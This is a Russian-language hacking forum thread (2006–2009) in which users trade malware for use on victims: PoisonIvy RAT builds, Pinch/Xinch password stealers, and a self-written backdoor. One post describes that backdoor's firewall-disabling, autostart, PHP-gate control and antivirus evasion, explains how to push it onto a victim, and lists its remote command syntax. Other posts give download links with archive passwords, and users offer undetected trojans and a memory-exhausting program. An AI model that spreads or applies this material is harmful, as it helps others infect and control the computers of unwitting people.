| Хак! Ломать не строить - это уметь надо |
Viruses.. Do not open!
,Делимся вирями...
Дата публикации:
de1ay, 18.07.2006 - 10:00
PoisonIvy 2.0Меня трой порадовал
Удобный, неглючный, с форумом поддержки PS:Хотелось-бы выразить благодарность в поимке лошадки в интернете парню с ником One Second
Пароль:
SoftoRooM.NeT
Jon-dog, 2.08.2006 - 10:59
Вот немного руссифицировал чтоб кто в англ плохо, понимали как сделать ехеDemonRND, 26.08.2006 - 19:43
Касперский его заметил... Обидно, а так класный тойанчик))snike, 28.08.2006 - 15:08
многофункциональный бэкдор под Win32-системы, работающий поархитектуре "клиент-сервер", с помощью которого можно практически полностью контролировать
зараженную систему.
Возможности:
- Выполнять любые команды в системе через коммандный интерпретатор cmd.exe
- Работа с файловой системой через cmd.exe
- Запускать любые программы в системе
- Выводить свое сообщение
- Выключать/Перезагужать/Завершить сеанс зараженной машины
- Закрывать/Открывать CD-ROM
- Включать/Выключать монитор
- Устанавливать свои собственные обои
- Выставлять мышь на левшу/правшу
- Установка курсора в разные координаты (:
- Включать/Выключать Scroll Lock, Num Lock, Caps Lock на клавиатуре
- Прятать кнопку "ПУСК", панель со свернутыми окнами, Quick Launch, часы, трей и т.д
Фичи:
- Автозагрзука из под winlogon (Userinit).
- Вырубает встроенный Windows-файрвол (ICF/ICS и WSCSVC), который блокирует коннекты к машине
- Управление зараженной машиной через PHP-гейт. Теперь об анонимности можно беспокоиться в два раза меньше.
- Маленький размер сервера. Всего ~4,50 килобайт (паковал FSG, компилил LCC, так что возможно еще меньше).
- На момент релиза, ни один антивирус не определил троянский код.
Впариваем троян (/server/server.exe) ламеру. Затем заливаем на шелл скрипт управлением трояном (/web/gate.php).
На шелле должен быть установлен PHP и поддерживаться работа с сокетами. Узнаем IP-адрес ламера. Заходим на
скрипт:
http://shell/sbg.php?....0.1&port=5745, где 127.0.0.1 - это IP-адрес жертвы. Затем вводим команды
в одно единственное поле.
----[ 0x02: команды
команды без аргументов:
CODE
hide_panel / show_panel
hide_start / show_start
hide_rebar / show_rebar
hide_quicklaunch / show_quicklaunch
hide_tasksw / show_tasksw
hide_trey / show_trey
hide_treybutton / show_treybutton
hide_treyicon / show_treyicon
hide_time / show_time
mouse_on / mouse_off
mouse_swap_on / mouse_swap_off
numlock_on / numlock_off
capslock_on / capslock_off
scrolllock_on / scrolllock_off
keyboard_on / keyboard_off
monitor_on / monitor_off
cdrom_open / cdrom_close
logof / power / rboot / stand / sleep
about
beep
hide_start / show_start
hide_rebar / show_rebar
hide_quicklaunch / show_quicklaunch
hide_tasksw / show_tasksw
hide_trey / show_trey
hide_treybutton / show_treybutton
hide_treyicon / show_treyicon
hide_time / show_time
mouse_on / mouse_off
mouse_swap_on / mouse_swap_off
numlock_on / numlock_off
capslock_on / capslock_off
scrolllock_on / scrolllock_off
keyboard_on / keyboard_off
monitor_on / monitor_off
cdrom_open / cdrom_close
logof / power / rboot / stand / sleep
about
beep
команды c аргументами:
CODE
set_wallpaper^C:\путь\к\картинке\в\формате.BMP
cmd^комманда
messagebox^текст_сообщения^заголовок_сообщения
crazy_cdrom^кол-во_выдвигов/задвигов
crazy_mouse^частота_сдвигов(мл.сек)^кол-во_раз
cmd^комманда
messagebox^текст_сообщения^заголовок_сообщения
crazy_cdrom^кол-во_выдвигов/задвигов
crazy_mouse^частота_сдвигов(мл.сек)^кол-во_раз
Примеры ввода команд:
CODE
monitor_off
messagebox^Hacked by SN!KE=))^
cmd^dir
cmd^type C:\a.txt
messagebox^Hacked by SN!KE=))^
cmd^dir
cmd^type C:\a.txt
Короче говоря ^ - разделитель.
_https://softoroom.org/...v0.01_beta.rar
З.Ы. При желании могу выложить исходник.
snike, 29.08.2006 - 22:16
Погляди на свой "Press any key to format C:"_https://softoroom.org/...1227999/sr.rar
Исходники...
de1ay, 20.09.2006 - 17:22
Пинч 2.58 - это итак все знают.
Download
Ксинч - альтернатива пинчу
https://softoroom.org/...M.NeT.rar.html
pWd: kalabok
Download
Ксинч - альтернатива пинчу
https://softoroom.org/...M.NeT.rar.html
pWd: kalabok
snike, 23.09.2006 - 15:24
Какая версия Ксинча?de1ay, 25.09.2006 - 14:54
QUOTE
Какая версия Ксинча?
1.5 alfa 3
Jon-dog, 6.12.2006 - 5:24
Трой не трой, и троем то не назвать, и вурусом, вобщем скрипт сброса (удаления) пароля на радмин при каждой перезагрузке компа! провернено на 2.1, 22mabden, 9.12.2006 - 9:47
Jon-dog не сможешь еще раз вылажить русик к PoisonIvy 2.0betepon, 9.12.2006 - 9:57
Линки :https://softoroom.org/...M.NeT.rar.html
https://softoroom.org/...1227999/sr.rar
https://softoroom.org/...v0.01_beta.rar
https://softoroom.org/...n-dog.rar.html
не работают.
SYS, 20.12.2006 - 14:38
Не один линк не работает (Jon-dog, 23.12.2006 - 22:42
Что именно?rx700, 19.01.2007 - 12:34
и недавно вышла еще новее версия_http://poisonivy-rat.com в разделе download
-=skyd@n=-, 8.06.2007 - 11:42
Во...
только что сам написал 
....За 5-10 сек. забивает оперативу 1гб...
С начала всё выглядит нормально но потом...
... Винда пишет не достаточно оперативи тб. тц..
Назвал: WinRamKiller пока 1,0 БЕТА
Качаем ~500kb тут
Пока не подчто не прикрытое позже будет копировать себя в Винду и запускатся прикаждой загрузке системы но уже скрыто...
Пока зацините вред...
KOder, 21.06.2007 - 15:56
качнул несколько троев--мне понравились)) у меня есть непалящийся трой .кому надо могу скинутьFcSM, 9.07.2007 - 20:16
KOder,Скинь мне ПЛИЗ!!!
Fritz, 13.07.2007 - 0:49
а где ScriptKid_BackDoor_v0.01_beta.rar?!! ссылка битая выложите кто нить!!!
Fritz, 1.08.2007 - 21:14
слишком паливный... дядбка avast его рассекретил ((Штуцер, 7.08.2007 - 18:27
По необходимости залез на ломалка.ру, и ес-но набросились вири. Мой нод вроде как отгавкался, но по крайней мере одну гадость я ему сам помог пропустить. Вот файлик запакованый, не могу разобраться что это. Кому интересно, можете посмотреть, нод ничего в нем не находит, а других антивирей я не ставил. А если смотреть неохота (что, в прочем, понятно), то посоветуйте где его можно проверить в сети.de1ay, 7.08.2007 - 18:37
QUOTE(Штуцер @ 7.08.2007 - 18:27)
где его можно проверить в сети.
На что проверить?
Jroslav2, 7.08.2007 - 18:38
аваст ругнулся, это в сеть лезет...de1ay, 7.08.2007 - 18:45
Штуцер,QUOTE
00401451 |. BF 84224000 MOV EDI,__c0054F.00402284 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Если файл записывает себя в эту ветку реестра, то явно не из добрых побуждений.
Штуцер, 7.08.2007 - 18:47
QUOTE
На что проверить?
Оно 2х ядрёный проц на 100% грузит, я его убил - система вроде как работает. Так интересно же, что это такое - там, вирус, троян... И чего с ним делать, чтоб вреда небыло больше.
В реестре в ранах его вроде нету... В автозагрузке тоже. У меня виста, где еще может прописаться?
de1ay, 7.08.2007 - 19:00
Штуцер, 7.08.2007 - 19:16
Значит, трояка. Я так и думал, шумный он какой-то - проц грузит, и винты шуршат. Явно роется, пративный. А где проверял-то, delay(0)?de1ay, 7.08.2007 - 19:31
_virustotal.comde1ay, 16.10.2007 - 18:51
Poison Ivy 2.3.0 (latest version)Mister_Gosha, 8.11.2009 - 19:17
Up темке.Poison Ivy 2.3.2 (latest version)
http://www.poisonivy-...?link=download
+ на странице загрузки еще несколько плагинов.
+ на странице загрузки еще несколько плагинов.
